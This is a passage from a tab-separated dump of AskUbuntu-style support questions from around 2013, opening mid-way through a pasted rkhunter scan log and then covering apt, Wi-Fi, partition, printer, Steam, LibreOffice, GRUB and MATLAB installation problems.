] rh-sharpe 's rootkit [ not found ] rsha 's rootkit [ not found ] scalper worm [ not found ] sebek lkm [ not found ] shutdown rootkit [ not found ] shv4 rootkit [ not found ] shv5 rootkit [ not found ] sin rootkit [ not found ] slapper worm [ not found ] sneakin rootkit [ not found ] 'spanish ' rootkit [ not found ] suckit rootkit [ not found ] superkit rootkit [ not found ] tbd ( telnet backdoor ) [ not found ] telekit rootkit [ not found ] t0rn rootkit [ not found ] trnkit rootkit [ not found ] trojanit kit [ not found ] tuxtendo rootkit [ not found ] urk rootkit [ not found ] vampire rootkit [ not found ] vckit rootkit [ not found ] volc rootkit [ not found ] xzibit rootkit [ not found ] zarwt.kit rootkit [ not found ] zk rootkit [ not found ] [ press < enter > to continue ] performing additional rootkit checks suckit rookit additional checks [ ok ] checking for possible rootkit files and directories [ none found ] checking for possible rootkit strings [ none found ] performing malware checks checking running processes for suspicious files [ none found ] checking for login backdoors [ none found ] checking for suspicious directories [ none found ] checking for sniffer log files [ none found ] performing trojan specific checks checking for enabled inetd services [ warning ] performing linux specific checks checking loaded kernel modules [ ok ] checking kernel module names [ ok ] [ press < enter > to continue ] checking the network ... performing checks on the network ports checking for backdoor ports [ none found ] checking for hidden ports [ skipped ] performing checks on the network interfaces checking for promiscuous interfaces [ none found ] checking the local host ... performing system boot checks checking for local host name [ found ] checking for system startup files [ found ] checking system startup files for malware [ none found ] performing group and account checks checking for passwd file [ found ] checking for root equivalent ( uid 0 ) accounts [ none found ] checking for passwordless accounts [ none found ] checking for passwd file changes [ none found ] checking for group file changes [ none found ] checking root account shell history files [ none found ] performing system configuration file checks checking for ssh configuration file [ found ] checking if ssh root access is allowed [ not allowed ] checking if ssh protocol v1 is allowed [ not allowed ] checking for running syslog daemon [ found ] checking for syslog configuration file [ found ] checking if syslog remote logging is allowed [ not allowed ] performing filesystem checks checking /dev for suspicious file types [ warning ] checking for hidden files and directories [ warning ] [ press < enter > to continue ] system checks summary ===================== file properties checks ... files checked : 137 suspect files : 1 rootkit checks ... rootkits checked : 307 possible rootkits : 0 applications checks ... all checks skipped the system checks took : 1 minute and 23 seconds all results have been written to the log file ( /var/log/rkhunter.log ) one or more warnings have been found while checking the system . please check the log file ( /var/log/rkhunter.log )
258662	apt-get 307 error	g'day the problem is ( for any type of mirror or package ) with apt-get update : failed to fetch http : //ubuntu.org.ua/ubuntu/dists/quantal/universe/binary-amd64/packages 307 temporary redirect but : $ wget http : //ubuntu.org.ua/ubuntu/dists/quantal/universe/binary-amd64/packages.gz -- 2013-02-20 11:16:39 -- http : //ubuntu.org.ua/ubuntu/dists/quantal/universe/binary-amd64/packages.gz resolving ubuntu.org.ua ( ubuntu.org.ua ) ... 89.184.72.161 connecting to ubuntu.org.ua ( ubuntu.org.ua ) |89.184.72.161|:80 ... connected . http request sent , awaiting response ... 200 ok length : 6792450 ( 6.5m ) [ application/octet-stream ] saving to : packages.gz 100 % [ ====================================== > ] 6,792,450 463k/s in 15s 2013-02-20 11:16:54 ( 454 kb/s ) - packages.gz saved [ 6792450/6792450 ] why does apt-get ca n't get anything ( packages list at first ) from repository ? upd : looks like apt ca n't get some ( ? ? ) headers while asking for packages list , the process stops on 'waiting for headers ' .
258666	firefox stops to work after ugrade to version 19 on ubuntu 12.04	firefox starts and then it stops to work and i have to force close it . i tried to run it in safe mode and i reset it but nothing works . someone else has the same problem ? thank you
258671	can not connect to home wireless internet	i have been using linux mint for the past few months and i decided to switch back to ubuntu . after doing so i have run into a peculiar error . i had previously been able to connect to the internet with my laptop , but as of now , i can not , as it refuses to connect to the wireless network i use . it will connect to other wireless networks , as that 's how i 'm posting this , but i can not seem to connect to my home network .
258672	windows partition not shown in ubuntu	recently my laptop win7 was crashed and i trying to backup the data before trying any recovery . for this i booted ubuntu ubuntu-10.10-desktop-i386 ( usb booted not installed on my hdd ) and trying mount the win7 partions to copy the files , but i could not see the all partitions in ubuntu . my partitions are : c : 310 gb d : 200mb ( system recovery ) e:100gb f:100gb g:130gb only c & d are mounted , all other drives are not mounted also not listed in fdisk -l. if i run the disk utility the i could see the 310gb ( c ) & 200mb ( d ) as ntfs , where as the there is 340gb free as unallocated space . please help me to detect and mount all the win7 partition in ubuntu .
258673	sharing external hdd from ubuntu to windows vista	my first question over here . i am struggling with getting a share working properly . please advise whether the logs and prints are viable and what else you may need . i have a pretty-much corrupted vista notebook that is blue-screening on usb plug in/plug out . the notebook is close to end its lifespan so i do n't bother fixing it . i want to plug my hdd to my ubuntu netbook which serves me as a remote storage basically . this way i can skip the awful bsod on vista if the hdd gets unplugged by mistake . my network consists of thomson modem which receives the internet signal . it is wired to dir-600 dlink wireless router to which my devices are connecting . i have connected usb drive to my ubuntu netbook , performed shares-admin share with r/w permissions . and i tried mapping that drive from windows machine , the fun begins : c : \windows\system32 > ping 192.168.0.12 pinging **192.168.0.12** with 32 bytes of data : reply from **192.168.0.101** : destination host unreachable . reply from 192.168.0.101 : destination host unreachable . reply from 192.168.0.101 : destination host unreachable . reply from 192.168.0.101 : destination host unreachable . while , 192.168.0.101 is the vista machine which i am pinging from . i started wondering what happens , the arp /icmp issue ? why is my machine even in the list of route ? ipconfig /all from my windows machine : windows ip configuration the host name . . . . . . . . . . . gabriela-pc primary dns suffix . . : type of the node . . . . . . . . . . . . : hybrid ip routing enabled . . . . . . . do not wins proxy enabled . . . . do not ethernet adapter local area connection 2 : state media . . . . . . . . . . . : media disconnected connection-specific dns suffix : description . . . . . . . . . . . . . . . : bluetooth personal area network physical address . . . . . . . . . . : 00-03-7a-81-78-c0 dhcp enabled . . . . . . . . . . : yes autoconfiguration enabled . . . . : yes wireless lan wireless network connection : connection-specific dns suffix : description . . . . . . . . . . . . . . . intel ( r ) pro / wireless 3945abg network con nection physical address . . . . . . . . . . : 00-1f-3c-76-27-55 dhcp enabled . . . . . . . . . . : yes autoconfiguration enabled . . . . : yes link-local ipv6 address . : fe80 : : 1d96 : 6b7d : 1760:908 e % 10 ( preferred ) ipv4 address . . . . . . . . . . . . . : 192.168.0.101 ( preferred ) the subnet mask . . . . . . . . . . : 255.255.255.0 lease obtained . . . . . . . . : february 20 , 2013 5:50:33 the lease expires . . . . . . . . . : february 27 , 2013 5:50:36 default gateway . . . . . . . . . . : 192.168.0.1 dhcp server . . . . . . . . . . . : 192.168.0.1 dhcpv6 iaid id . . . . : 251666236 dhcpv6 client duid : 00-01-00-01-10-0a-91-79-00-1e-68-70-8f-10 dns servers . . . . . . . . . . . : 62.179.1.63 62.179.1.62 netbios over tcpip . . . . . . . : on ethernet adapter local area connection : state media . . . . . . . . . . . : media disconnected connection-specific dns suffix : description . . . . . . . . . . . . . . . marvell yukon pci-e 88e8040t fast ethernet t controller physical address . . . . . . . . . . : 00-1e-68-70-8f-10 dhcp enabled . . . . . . . . . . : yes autoconfiguration enabled . . . . : yes tunnel adapter local area connection * : state media . . . . . . . . . . . : media disconnected connection-specific dns suffix : description . . . . . . . . . . . . . . . : isatap . { eac8232a-2f30-4fb6-8f66-faa69c4ae 976 } physical address . . . . . . . . . . : 00-00-00-00-00-00-00-e0 dhcp enabled . . . . . . . . . . do not autoconfiguration enabled . . . . : yes tunnel adapter local area connection * 3 : connection-specific dns suffix : description . . . . . . . . . . . . . . . : teredo tunneling pseudo-interface physical address . . . . . . . . . . 02-00-54-55-4e-01 dhcp enabled . . . . . . . . . . do not autoconfiguration enabled . . . . : yes ipv6 address . . . . . . . . . . . . : 2001:0:9 d38 : 6ab8 : 242c : 2f27 : 3f57 : ff9a ( pref erowa ) link-local ipv6 address . : fe80 : : 242c : 2f27 : 3f57 : ff9a % 9 ( preferred ) default gateway . . . . . . . . . . : : : netbios over tcpip . . . . . . . : off tunnel adapter local area connection * 7 : tunnel adapter local area connection * 7 : state media . . . . . . . . . . . : media disconnected connection-specific dns suffix : description . . . . . . . . . . . . . . . : isatap . { 274797ec-4b95-e7ac-947f-fca2de2d2 b07 } physical address . . . . . . . . . . : 00-00-00-00-00-00-00-e0 dhcp enabled . . . . . . . . . . do not autoconfiguration enabled . . . . : yes tunnel adapter local area connection * 9 : state media . . . . . . . . . . . : media disconnected connection-specific dns suffix : description . . . . . . . . . . . . . . . : isatap . { 24d921f5-cc7f-4123-8c91-9900221a7 3e1 } physical address . . . . . . . . . . : 00-00-00-00-00-00-00-e0 dhcp enabled . . . . . . . . . . do not autoconfiguration enabled . . . . : yes route print from my windows machine : ================================================== ========================= ë in interface list 11 ... 00 03 7a 81 78 c0 ... ... bluetooth personal area network 10 ... 00 1f 3c 76 27 55 ... ... intel ( r ) pro / wireless 3945abg network connection 8 ... 00 1e 68 70 8f 10 ... ... 88e8040t marvell yukon pci-e fast ethernet controller 1 ... ... ... ... ... ... ... ... ... software loopback interface 1 15 ... 00 00 00 00 00 00 00 e0 isatap . { eac8232a-2f30-4fb6-8f66-faa69c4ae976 } 9 ... 02 00 54 55 4e 01 ... ... teredo tunneling pseudo-interface 16 ... 00 00 00 00 00 00 00 e0 isatap . { 274797ec-4b95-e7ac-947f-fca2de2d2b07 } 17 ... 00 00 00 00 00 00 00 e0 isatap . { 24d921f5-cc7f-4123-8c91-9900221a73e1 } ================================================== ========================= ipv4 route table ================================================== ========================= active routes : network destination netmask gateway interface metric 0.0.0.0 0.0.0.0 192.168.0.1 192.168.0.101 30 127.0.0.0 255.0.0.0 on-link 127.0.0.1 306 127.0.0.1 255.255.255.255 on-link 127.0.0.1 306 127.255.255.255 255.255.255.255 on-link 127.0.0.1 306 192.168.0.0 255.255.255.0 on-link 192.168.0.101 286 192.168.0.101 255.255.255.255 on-link 192.168.0.101 286 192.168.0.255 255.255.255.255 on-link 192.168.0.101 286 224.0.0.0 240.0.0.0 on-link 127.0.0.1 306 224.0.0.0 240.0.0.0 on-link 192.168.0.101 286 255.255.255.255 255.255.255.255 on-link 127.0.0.1 306 255.255.255.255 255.255.255.255 on-link 192.168.0.101 286 ================================================== ========================= routes take ? email : lack ipv6 route table ================================================== ========================= active routes : them ? if metric network destination gateway 9 18 : : / 0 on-link 1 306 : : 1/128 on-link 9 18 2001 : : / 32 on-link 9 266 2001:0:9 d38 : 6ab8 : 242c : 2f27 : 3f57 : ff9a/128 on-link 10 286 fe80 : : / 64 on-link 9 266 fe80 : : / 64 on-link 10 286 fe80 : : 1d96 : 6b7d : 1760:908 e/128 on-link 9 266 fe80 : : 242c : 2f27 : 3f57 : ff9a/128 on-link 1 306 ff00 : : / 8 on-link 9 266 ff00 : : / 8 on-link 10 286 ff00 : : / 8 on-link ================================================== ========================= routes take ? email : lack i am sorry but due to lack of much time i will continue this thread today 's evening , providing some extracts from my ubuntu . please advise if at this point there is anything you can suggest to boost this further on .
258675	how can i install binutils from source ?	uname -a : linux ubuntu 3.5.0-23-generic # 35-ubuntu smp thu jan 24 13:05:29 utc 2013 i686 i686 i686 gnu/linux root @ ubuntu : /home/ubuntu # apt-get source binutils reading package lists ... done building dependency tree reading state information ... done e : ignore unavailable target release 'stable ' of package 'binutils' e : unable to find a source package for i did apt-get update before typing the command . how can i get binutils ? i am using ubuntu 12.10 . i am following the instruction on https : //wiki.ubuntu.com/toolchain/crosscompilers/armeabitoolchain i am stuck at the first line . i did sudo add-apt-repository ppa : germia/archive3 previously , however i got some errors then , i did sudo add-apt-repository -- remove ppa : germia/archive3 to undo the setting . i wonder if my problem is related wtih this ppa ?
258679	how to hide top menubar bar . needed for the wine	ubuntu unity use top bar like mac . nice . but , how to get the top bar hide ? im using wine or playonlinux program . and im using virtual desktop in my screen . big problem is a virtual desktop not fit the screen . virtual screen size is 1024 * 768 . screen size is 1360*768. this 768 not fit the screen . game using virtual desktop . this 768 resolution does not fit the window because it will hit the top bar . and the game goes to another workspace window . it makes some games to play hard , when game menus and toolbars is a bottom in second workspace . please add ubuntu options to hide top bar . im using ubuntu 12.10 .
258681	battery status in notification	i do n't really know about scripts but i 'm trying to create one to display battery level when a key is pressed . i 've done this : battery_level=`acpi -b | grep -p -o ' [ 0-9 ] + ( ? = % ) '` ac_power=`acpi -a | grep -p -o 'off-line'` ico=/icons/battery/full.png notify-send `` battery : $ battery_level % '' `` ac : $ ac_power '' -- icon= $ ico -a `` power '' -u critical -t 100 i would like it to change display `` on-line '' when ac power is connected . i would also like to change icon depending on battery_level if ac_power = off-line if batery_level > 0 and battery_level < 20 then ico=critical.png if batery_level > 20 then ico=full.png if ac_power = on-line if batery_level > 0 and battery_level < 20 then ico=accritical.png if batery_level > 20 then ico=acfull.png
258698	windows 7+ubuntu 12.04 dual boot partitioning confusion	i 'm trying to dual boot desktop ubuntu for the first time , and hopelessly flummoxed by the partitioning process . i 've got a lenovo notebook ( windows 7 ) with a 500gb hdd + 28gb ssd , and my goal is to create a single small ( ~24gb ) ubuntu partition on the hdd for both the os and filesystem ( i.e . i do n't need to share files between ubuntu and windows ) . this is what i see in windows disk management , after shrinking the c : partition to leave that 23.44 gb of unallocated space : there are only 3 primary partitions ( system_drv , c : , and d : ) , so there should be room for another . i assume the oem partition is a system restore partition . i 'm totally lost about what to do on the ubuntu side . when i try to install it from a bootable usb stick , i do n't see any devices in the list : i 've tried 12.10 , 12.04 , 32-bit , 64-bit , and multiple usb sticks , but nothing ever shows up , and the buttons along the bottom are inactive . i 'm supposed to choose a device from that field , right ? what am i missing ?
258700	revert computer name	i changed computer name ( host name ) but forgot to make a backup , now sudo do n't work . how can i fix this . i ca n't manually change /etc/hosts file because root controls that file , and i ca n't access it . please help
258704	can ubuntu on nexus 7 run desktop ubuntu programs ?	i 'm thinking about getting an ubuntu on nexus 7 and i have one question : programs that runs on ubuntu desktop ( like steam , that have support for linux , or game 's for linux ) will work ?
258705	ca n't install steam on ubuntu 12.04	i am not able to install steam . firstly , from the ubuntu software centre it fails to install and i get the following ; the following packages have unmet dependencies : steam64 : depends : steam ( = 1.0.0.27ubuntu1 ) ` but it is a virtual package . then when i read another method using terminal to update , clear steam , then install steam , i get : the following packages have unmet dependencies : steam : i386 : depends : libgl1-mesa-dri : i386 depends : libgl1-mesa-glx : i386 e : unable to correct problems , you have held broken packages . any help would be appreciated .
258710	user mode linux on arm	i usually use uml but seems arm architecture does n't support it . can i use uml on arm ? before this i shared tiny servers with my friends . now , i bought arm based server . anybody knows how to use uml on arm based pc ?
258713	ubuntu sdk conflicts with amarok	apt removed amarok after installing ubuntu sdk due to dependencies conflict . now when i try to reinstall it again i get this message is7yx @ is7yx-satellite-l305 : ~ $ sudo apt-get install amarok reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : amarok : depends : amarok-common ( = 2:2.6.0-0ubuntu2 ) but 2:2.6.0-0ubuntu2.1 is to be installed depends : amarok-utils ( = 2:2.6.0-0ubuntu2 ) but 2:2.6.0-0ubuntu2.1 is to be installed recommends : media-player-infoxs but it is not installable e : unable to correct problems , you have held broken packages .
258714	ubuntu tv on samsung smart tv 2012	are there any chances that samsung smart tvs from 2012 will be supported by ubuntu tv ? only thing i could find is : samygo.tv : they have a forum , a wiki and there even is quake running on it !
258715	how can i set the date/time of a mail in thunderbird	how can i change the date/time thunderbird inserts in the mails date header ? i want to insert a date which is in the past , so i do not ( ! ) need a `` send later '' functionallity . i 'm searching for an extension which allows me to set the date header . i know that it is discouraged to change the date header , but this is simply for internal purposes , we sometimes need mails to appear at other dates in the messagelist .
258719	12.04 server installation	i have a really strange problem . i want to install ubuntu server 12.04 from a usb flash drive . after the boot , on the installation menu screen , there is only one option : 'rescue a broken system ' . also , the system on which i want to make the installation has no os pre-installed . any ideas ? thanks
258724	epson perfection v30 scanner installation problem	further to my epson v30 scanner installation problems , below is the message when the key driver file installation is attempted . i see many people have successfully installed their v30 . has anyone seen this error and got around it ? i tried the help from dan and still no luck . if i am not following etiquette please forgive me as i am new to linux and the forum . so i will hope i can learn more . root @ ubuntu : ~ # dpkg -i /home/john/downloads/iscan_2.29.1-5~usb0.1.ltdl7_i386.deb selecting previously unselected package iscan . ( reading database ... 157309 files and directories currently installed . ) unpacking iscan ( from ... /iscan_2.29.1-5~usb0.1.ltdl7_i386.deb ) ... dpkg : dependency problems prevent configuration of iscan : iscan depends on iscan-data . iscan depends on libgtk2.0-0 ( > = 2.14.1 ) ; however : package libgtk2.0-0 : i386 is not installed . iscan depends on libltdl7 ( > = 2.2.4 ) ; however : package libltdl7 : i386 is not installed . iscan depends on libsane ( > = 1.0.11-3 ) ; however : package libsane : i386 is not installed . iscan depends on libusb-0.1-4 ( > = 2:0.1.12 ) ; however : package libusb-0.1-4 : i386 is not installed . dpkg : error processing iscan ( -- install ) : dependency problems - leaving unconfigured processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for man-db ...
258728	filemanagers crash all the time	i 'm using lubuntu 12.04 and having problems with the filemanager . when i try to open the filemanager nothing happens . in the dmesg log the following error is shown : pcmanfm [ 2330 ] : segfault at 10 ip xxxxx sp xxxxx error 4 in libgioremote-volume-monitor.so [ xxxxx+10000 ] the filemanagers thunar and nautilus show the same errors . has anyone seen this problem before ? is there a solution where i do n't need to reinstall lubuntu ?
258729	is ubuntu totally functional on intel extreme dz77ga hardware ?	well , i installed windows 8 and found multiple incompatibilities with my hardware . i experienced freezes while shutting down and restarting windows 8 . i 'm totally new to ubuntu , and before trying it out , i would be pleased to know , if the following hardware combination functions fully with ubuntu , without occurring bugs mentioned above . my hardware specifications : intel extreme dz77ga 70k ram - 16gb g-skill ripjawsx 1866mhz ( 1.65v ) hdd - 1tb toshiba mk1002tskb ( 7200rpm ) vga - 2gb evga gt640** does ubuntu have drivers for the above specs ? will ubuntu run smoothly on my machine without any conflicts ?
258734	using shortkeys to search the internet for a term selected in a text editor/viewer running under wine ?	there is a very elegant solution to use shortkeys to search the internet ( or translate on google translation etc ) a text selected in a text editor/viewer , but that solution does not seem to work in programs installed under wine , like notepad and office 2007 . i wander what the cause might be and whether there is a way to make it work . ( i created this question to bring this into spotlight , but in the end it may be closed as duplicate of the other one , and its answers migrated there . so , in case you feel like closing this , please wait until an accepted answer is posted , or even better try to answer it - here or there . ) edit after ignite 's comments : a problem is that a text selected in a wine application it is not directly available outside wine . that might make unusable the script in the linked answer , which involves xclip ( and that is clearly outside wine ) . wine is a linux program . i use libreoffice and office2007 for translating , writing and editing texts and want to be able to use shortcuts to search selected text in search engines or to translate it quickly in the same way . it saves me a lot of time and am already able to do it in libreoffice . why not writing a wine script ? winetricks is nothing but that
258738	problem with update of libreoffice	this is a problem : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libreoffice-core : depends : libreoffice-common ( > 1:3.5.7 ) but 1:3.5.4-0ubuntu1.1 is installed e : unmet dependencies . try using -f. than i used what is said output below : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : bind9utils libmcrypt4 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : libreoffice-common suggested packages : libreoffice-style-hicontrast libreoffice-style-crystal libreoffice-style-oxygen the following packages will be upgraded : libreoffice-common 1 upgraded , 0 newly installed , 0 to remove and 6 not upgraded . 14 not fully installed or removed . need to get 0 b/20.9 mb of archives . after this operation , 2,048 b of additional disk space will be used . do you want to continue [ y/n ] ? ( reading database ... 428585 files and directories currently installed . ) preparing to replace libreoffice-common 1:3.5.4-0ubuntu1.1 ( using ... /libreoffice-common_1 % 3a3.5.7-0ubuntu4_all.deb ) ... unpacking replacement libreoffice-common ... dpkg : error processing /var/cache/apt/archives/libreoffice-common_1 % 3a3.5.7-0ubuntu4_all.deb ( -- unpack ) : corrupted filesystem tarfile - corrupted package archive dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) rmdir : failed to remove `/var/lib/libreoffice/share/prereg/ ' : no such file or directory rmdir : failed to remove `/var/lib/libreoffice/share/ ' : directory not empty rmdir : failed to remove `/var/lib/libreoffice/program/ ' : no such file or directory rmdir : failed to remove `/var/lib/libreoffice ' : directory not empty rmdir : failed to remove `/var/lib/libreoffice ' : directory not empty processing triggers for shared-mime-info ... unknown media type in type 'all/all' unknown media type in type 'all/allfiles' unknown media type in type 'uri/mms' unknown media type in type 'uri/mmst' unknown media type in type 'uri/mmsu' unknown media type in type 'uri/pnm' unknown media type in type 'uri/rtspt' unknown media type in type 'uri/rtspu' processing triggers for man-db ... processing triggers for gnome-icon-theme ... processing triggers for hicolor-icon-theme ... errors were encountered while processing : /var/cache/apt/archives/libreoffice-common_1 % 3a3.5.7-0ubuntu4_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) than i looked up for error message found this post using it give next output ~ $ sudo dpkg -- configure -a dpkg : dependency problems prevent configuration of libreoffice-core : libreoffice-core depends on libreoffice-common ( > > 1:3.5.7 ) ; however : version of libreoffice-common on system is 1:3.5.4-0ubuntu1.1 . dpkg : error processing libreoffice-core ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libreoffice-style-human : libreoffice-style-human depends on libreoffice-core ; however : package libreoffice-core is not configured yet . dpkg : error processing libreoffice-style-human ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libreoffice-math : libreoffice-math depends on libreoffice-core ( = 1:3.5.7-0ubuntu4 ) ; however : package libreoffice-core is not configured yet . dpkg : error processing libreoffice-math ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libreoffice-impress : libreoffice-impress depends on libreoffice-core ( = 1:3.5.7-0ubuntu4 ) ; however : package libreoffice-core is not configured yet . dpkg : error processing libreoffice-impress ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libreoffice-style-tango : libreoffice-style-tango depends on libreoffice-core ; however : package libreoffice-core is not configured yet . dpkg : error processing libreoffice-style-tango ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libreoffice-writer : libreoffice-writer depends on libreoffice-core ( = 1:3.5.7-0ubuntu4 ) ; however : package libreoffice-core is not configured yet . dpkg : error processing libreoffice-writer ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libreoffice-base-core : libreoffice-base-core depends on libreoffice-core ( = 1:3.5.7-0ubuntu4 ) ; however : package libreoffice-core is not configured yet . dpkg : error processing libreoffice-base-core ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libreoffice-gnome : libreoffice-gnome depends on libreoffice-core ( = 1:3.5.7-0ubuntu4 ) ; however : package libreoffice-core is not configured yet . dpkg : error processing libreoffice-gnome ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libreoffice-emailmerge : libreoffice-emailmerge depends on libreoffice-core ; however : package libreoffice-core is not configured yet . dpkg : error processing libreoffice-emailmerge ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libreoffice-gtk : libreoffice-gtk depends on libreoffice-core ( = 1:3.5.7-0ubuntu4 ) ; however : package libreoffice-core is not configured yet . dpkg : error processing libreoffice-gtk ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python-uno : python-uno depends on libreoffice-core ( = 1:3.5.7-0ubuntu4 ) ; however : package libreoffice-core is not configured yet . dpkg : error processing python-uno ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libreoffice-draw : libreoffice-draw depends on libreoffice-core ( = 1:3.5.7-0ubuntu4 ) ; however : package libreoffice-core is not configured yet . dpkg : error processing libreoffice-draw ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libreoffice-help-en-us : libreoffice-help-en-us depends on libreoffice-writer | language-support-translations-en ; however : package libreoffice-writer is not configured yet . package language-support-translations-en is not installed . dpkg : error processing libreoffice-help-en-us ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of libreoffice-calc : libreoffice-calc depends on libreoffice-core ( = 1:3.5.7-0ubuntu4 ) ; however : package libreoffice-core is not configured yet . libreoffice-calc depends on libreoffice-base-core ( = 1:3.5.7-0ubuntu4 ) ; however : package libreoffice-base-core is not configured yet . dpkg : error processing libreoffice-calc ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : libreoffice-core libreoffice-style-human libreoffice-math libreoffice-impress libreoffice-style-tango libreoffice-writer libreoffice-base-core libreoffice-gnome libreoffice-emailmerge libreoffice-gtk python-uno libreoffice-draw libreoffice-help-en-us libreoffice-calc if anyone has fixed the problem , tell me what to do
258740	sharing a printer in windows 8 with a ubuntu machine on a network	i 'm struggling to share a printer that is connected to my windows 8 machine with a other ubuntu linux machines . it keeps on asking me the username and password to connect to the windows 8 machine . even the same thing when browsing the network normally in home folder . i 've tried all possible usernames and passwords , but no success . please assist , i 've checked all possible settings like sharing the printer and switching on printer file sharing support and also switched off passwords and still no success . i 've also tried various ways and settings in gadmin samba in ubuntu and also no success . i do n't know if i 'm missing something or overlooking something . what else can i do ? please help .
258741	unable to connect to wireless network . ( acer travelmate 4152nlci )	kinda new to ubuntu : ) i do n't have any knowledge about programming or tech stuff so , please go easy on me : ) . i 've decided to wipe my windows xp os and decided to have ubuntu 12.10 . it worked fine for a week then , my laptop suddenly lost the ability to connect to a wireless network . a notice will constantly pop up and ask for my wpa passphrase . tried to type the correct password but it ca n't connect . the same notice keeps on popping up . p.s . i 've made sure the wifi toggle on the laptop is on . the specs : intel pentium m 740 ( 2mb l2 cache , 1.73ghz , 533 mhz fsb ) intel graphics media accelerator 900 60 gb hdd 1.2 gb ddr2 ram network controller : intel corporation pro/wireless 2200bg
258743	what is the best fortran 77 ide ?	i use ubuntu 12.04 . i need to do some coding with fortran 77 . i have'nt found any ide for fortran 77 . what is the solution ?
258744	how to convert a raw video using ffmpeg	i have a raw video that has the following properties : 25 fps uyvy codec 876 mbit/s avi container i want to convert this raw file to another container using ffmpeg . right now the problem is that the output video is being compressed . any idea how to do this without compressing the output file . i have tried : ffmpeg -i video.avi -r out.avi and it did not help .
258745	do i need to set a `` location '' for a printer in ubuntu ?	i am trying to install the printer onto my ubuntu system and after having installed the driver , it simply wont install . it shows me the actual printer , but i click print and nothing happens . everything is filled out in the printer properties , but the `` location '' field . is that where the printer 's ip address goes ?
258746	initramfs prompt `` mount : ca n't read etc/fstab '' after grub rescue	i had a bootable usb key witk ubuntustudio with two partitions : /dev/sdb1 with ubuntu and a fat32 /dev/sdb2 . then i realized that windows only reads partitions if they are the first . so i moved the partitions and now i have ubuntu on /dev/sdb2 and fat32 on /dev/sdb1 . i made this creating an image of the old /dev/sdb1 with ubuntu by dd command and then restoring it on the new /dev/sdb2 with dd again . so obviously now the usb pen fails to reboot and give me the grub rescue prompt i made this , after having verified that the vmlinuz and initrd files are in ( hd0 , msdos2 ) partition : grub rescue > set root= ( hd0 , msdos2 ) /boot grub rescue > insmod linux grub rescue > linux ( hd0 , msdos2 ) /boot/vmlinuz-3.5.0-17-lowlatency grub rescue > initrd ( hd0 , msdos2 ) /boot/initrd.img-3.5.0-17-lowlatency grub rescue > boot when i boot i fall into initramfs prompt . i think that is because the /dev/sdb2 is not mounted . because after the boot command i get : mount : ca n't read 'etc/fstab ' : no such file or directory begin : running /scripts/init-bottom ... mounting /dev on /root/dev failed : no such file or directory but how can i tell to grub which is the new partition from inside grub rescue prompt ?
258751	steam does not run on ubuntu 12.10	i 've been reading what i can of other people 's posts , but my problem does n't seem to match theirs , so i figured i 'd make a new thread . that being said , i may have missed such a post , so please feel free to point me in the right direction : ) i have an ati 5xxx video card , amd processor ( i do n't remember the specifics and do not know how/where to find this information , sorry ) i am running 64 bit , and originally had another users error where they needed to install the 32-bit files to help steam run . i ran that command line and installed everything , and then rebooted . after that first attempt where it failed to run steam , it has n't even tried to open since . double-clicking the icon does nothing ; typing steam into terminal only gives the following : running steam on ubuntu 12.10 64-bit steam_runtime is enabled automatically and that 's it ! no following message or anything . i 've uninstalled steam through terminal twice , and reinstalled again through different methods , whether it 's through the .deb file which then runs the software center , or through 'sudo apt-get install steam ' . nothing even puts the icon back on the desktop , and typing steam into terminal only gives the same response , regardless of what i do . any help or suggestions ? i 'm getting to the point where i 'm thinking of just reinstalling ubuntu , then installing the 32 bit information , then installing steam ...
258753	how to make ubuntu use more ram ?	after 2 weeks of trying , failing , trying again , still failing , i finally got ubuntu stable and operational . my hard disk is quite old and slow but i have excessive ram ( 16 gb 2133 mhz ) , so i was thinking about using that ram for faster fetching . how can i manually cache programs ' binaries before running it ? i know about preload but that 's not what i want , i want to be able to lock the process ' binaries in the memory so it ca n't get out and i wan na do that manually , preferably with gui but i do n't have a problem with terminal . i do n't wan na run it , just load the binaries and dependencies in memory . do you know anything that can do that ?
258756	compizconfig not working	the unity launcher and panel reset they 're color to chameleon after restart.i 've tried it on several versions of 12.04 ( 12.04,12.04.1,12.04.2 ) . reinstalled ăbuntu because it was freezing on shutdown ( no solution found ) . after first reinstallment i had problems with constant crashing of plymouth ( every 5-10 mins ) so i installed ubuntu again , this time the splash screen was missing on boot , annoying like ... . , reinstalled it again , this time messed ubuntu up cause install of compiz config frozen and forced shutdown ( messed my sistem completely ) , now i can not se a color for launcher do n't know why.im reinstalling and reinstalling since yesterday . ( for different reasons )
258767	installation of matlab r2012a in ubuntu 12.04 lts	i am using ubuntu 12.04 and i tried to install matlab r2012a in it . at first i installed `` ia32-libs '' and then i tried to run it using the following command : sudo /media/mathworks_r2012a/install -glnx86 -v but it showed sudo : /media/mathworks_r2012a/install : command not found how can i fix it ?
